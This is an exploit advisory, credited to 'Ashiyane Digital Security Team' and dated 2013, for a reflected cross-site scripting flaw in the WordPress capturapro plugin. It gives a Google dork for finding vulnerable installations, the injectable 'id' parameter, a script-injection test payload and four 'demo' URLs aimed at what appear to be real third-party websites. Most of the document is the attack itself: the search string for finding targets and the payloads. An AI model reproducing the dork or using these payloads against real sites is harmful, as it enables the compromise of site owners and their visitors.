#######################################################################
# Exploit Title : Wordpress capturapro Plugin Cross site scripting
#
# Exploit Author : Ashiyane Digital Security Team
#
# Google Dork : inurl:wp-content/plugins/capturapro
#
# Software Link : www.wordpress.org
#
# Tested on: Windows , Linux
#
# Date: 2013/11/22
#
#############################################
# Exploit : Cross site scripting
#
# Location1:
[Target]/wp-content/plugins/capturapro/lp/index.php?id=[xss]
#
#
# Script For Test : "/><script>alert(1);</script>
#
##########################################
# Demo
http://mensajesublXiminalextremo.com/wp-content/plugins/capturapro/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/lol/%29;%3C/script%3E
http://marinaybarXenlared.com/wp-content/plugins/capturapro/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/lol/%29;%3C/script%3E
http://formulatuXexito.com/wp-content/plugins/capturapro/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/lol/%29;%3C/script%3E
http://wpalenciXa.com/wp-content/plugins/capturapro/lp/index.php?id=1%22/%3E%3Cscript%3Ealert%28/lol/%29;%3C/script%3E
##############
Milad Hacking
We Love Mohammad
##############